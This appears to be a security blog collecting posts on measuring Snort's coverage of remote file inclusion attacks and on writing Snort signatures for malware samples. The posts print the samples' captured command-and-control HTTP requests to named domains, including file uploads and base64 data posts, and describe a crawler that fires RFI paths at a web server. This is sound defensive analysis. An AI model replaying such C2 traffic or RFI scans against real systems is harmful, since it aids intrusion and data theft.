RFI Coverage in Emerging Threats

ha.ckers posted a Large List of RFIs (1000+) awhile back which caught my eye.

Continuing on with my socket programming practice, I put together rficrawl.c that loops through each remote file include pathname, stuffs it into a GET and launches it at a webserver.

I made a PCAP of the traffic while rficrawl was running and fed it to Snort. Snort was using a default snort.conf configuration file along with the Mar 27th version of Emerging Threats ruleset.

The alert breakdown is over here.

The Mar 26th version of RSnake's RFI list contains 2203 unique RFIs. There were 1541 alerts generated, resulting in about 70% coverage. The majority of them, 1410 alerts (64%) were detected by the generic, catch-all "ET WEB_SERVER PHP Remote File Inclusion (monster list http)" signature.

This leaves 662 currently undetected vulnerabilities!

Snort Signature Practice: video.exe

video.exe is a fake AV malware. It resolves softmetalgroup.com (195.88.190.54) and does a GET for "/check". The server returns a "200 OK", but a "404 Not Found" page is returned:

GET /check HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:38 GMT
Content-Type: application/octet-stream
Content-Length: 208
Last-Modified: Fri, 16 Oct 2009 15:35:48 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /check was not found on this server.</p>
<hr>
</body></html>

This is part of the check-in process as it doesn't match up with a proper 404 from nginx as we'll see later.

A POST comes next that pushes a binary file:

POST /loads2.php?r=56.1 HTTP/1.1
Content-Type: multipart/form-data; boundary= 82859F64871E
User-Agent: Microsoft Internet Explorer
Host: softmetalgroup.com
Content-Length: 351
Connection: Keep-Alive

--82859F64871E
Content-Disposition: form-data; name="file"; filename="afile"
Content-Transfer-Encoding: binary
Content-Type: application/octet-stream

...

--82859F64871E--HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:10:39 GMT
Content-Type: text/html; charset=windows-1252
Transfer-Encoding: chunked
Keep-Alive: timeout=20
X-Powered-By: PHP/5.3.1

2
OK
0

I base my signature off of this request, filename, parameter name and User-Agent:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"video.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/loads2.php?r="; content:"User-Agent\: Microsoft Internet Explorer|0D 0A|"; sid:0305201001;)

Next, there are multiple GETs for "/omni.gif". The User-Agent switches to something that looks more legitimate and proper 404 errors are returned:

GET http://softmetalgroup.com/omni.gif HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softmetalgroup.com
Connection: close

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Fri, 05 Mar 2010 23:12:21 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 529
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
<!-- The padding to disable MSIE's friendly error page -->
...

I'm not sure if these are keep-alive requests or not.

Virustotal
ThreatExpert
mwanalysis

Snort Signature Practice: decode.c

decode.c steps through a Snort signature changing the printable "content: |xx|" blocks to ASCII so that it is easier to read.

Using a sample (by Don Jackson of Secureworks) from Emerging Threats Virus rules:

dennis@ipa:~/projects/decode$ ./decode
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN RhiFrem Trojan Activity - cmd"; flow:to_server,established; content:"GET|20|"; offset:0; depth:4; content:"User|2D|Agent|3A 20|Mozilla|2F|5|2E|0|20|Gecko|2F|20050212|20|Firefox|2F|1|2E|5|2E|0|2E|2"; pcre:"/^GET\x20[^\x0D\x0A]+\x3Fmod\x3Dcmd\x26user\x3D\w+[^\x0D\x0A]*\x20HTTP\x2F1\x2E0\x0D\x0A.*\x0D\x0AHost\x3A\x20\w+/"; reference:url,www.castlecops.com/U_S_Courts_phish792683.html; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008139; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Rhifrem; sid:2008139; rev:3;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN RhiFrem Trojan Activity - cmd"; flow:to_server,established; content:"GET "; offset:0; depth:4; content:"User-Agent: Mozilla/5.0 Gecko/20050212 Firefox/1.5.0.2"; pcre:"/^GET\x20[^\x0D\x0A]+\x3Fmod\x3Dcmd\x26user\x3D\w+[^\x0D\x0A]*\x20HTTP\x2F1\x2E0\x0D\x0A.*\x0D\x0AHost\x3A\x20\w+/"; reference:url,www.castlecops.com/U_S_Courts_phish792683.html; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008139; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Rhifrem; sid:2008139; rev:3;)

Snort Signature Practice: Setup_2022.exe

Setup_2022.exe resolves greatnorthwill.com (91.213.121.52) and calls home via a GET request:

GET /?mod=vv&i=1&id=2022 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: greatnorthwill.com
Cache-Control: no-cache

For the signature I used the parameter names and the User-Agent string:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"Setup_2022.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?mod="; uricontent:"&i="; uricontent:"&id="; content:"User-Agent\: Mozilla|0D 0A|"; sid:012220101;)

"mod" and "i" stayed static on the test runs.

References:

Virustotal
ThreatExpert

Snort Signature Practice: A-Install-815416_2009-1939.exe

A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries resolving thebigben.cn:

GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache

After comparing a few captures, the parameters change like this:

act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)

My first signature tries to match the particulars of the parameters with a pcre:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)

This didn't feel like a clean signature so I simplified it to:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)

References:

Virustotal
CWSandbox
ThreatExpert

Snort Signature Practice: spyeraser096.exe

spyeraser096.exe is one of those fake anti-virus malwares. It does a GET request to spyeraser.ir (193.104.110.81):

GET /statav.php?wmid=3&name=a0331bb5faf7707f HTTP/1.1
Host: spyeraser.ir

I used the file and parameter names for the signature:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"spyeraser096.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/statav.php?wmid="; uricontent:"&name="; sid:010120101;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: n-bss.exe

n-bss.exe does a GET phone home to gateshis.cn (91.213.174.9) then tries to download another n-bss.exe binary from blogcz.cn (not resolving):

GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive

knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: logo.exe

logo.exe POSTs a base64 encoded file to gator.php on yourclicker.cn (124.217.251.182). It also resolves ya.ru (77.88.21.8, 213.180.204.8, 93.158.134.8), but I never saw any traffic to these IPs:

POST /gator.php HTTP/1.0
Host: yourclicker.cn
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 3088

a=&b=&d=&c=UDNNTAAAAAA/BwAAEQAAAAAAAAAIAAAAIyw9LCyblXsSAAAAAAAAABAAAADZBwwABAAfABcA
AgAiAPkBEwAAAAAAAACkAAAApAAAAAMAAAA1NTI3NC02NDEtMjM4Mjk1Ni0yMzg0NAAuAAAA
...more base64

I based the signature on the file name and POST parameter names--the out of order d and c parameters felt unique.

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; content:"&d="; content:"&c="; sid:123120093;)

References:

Virustotal
ThreatExpert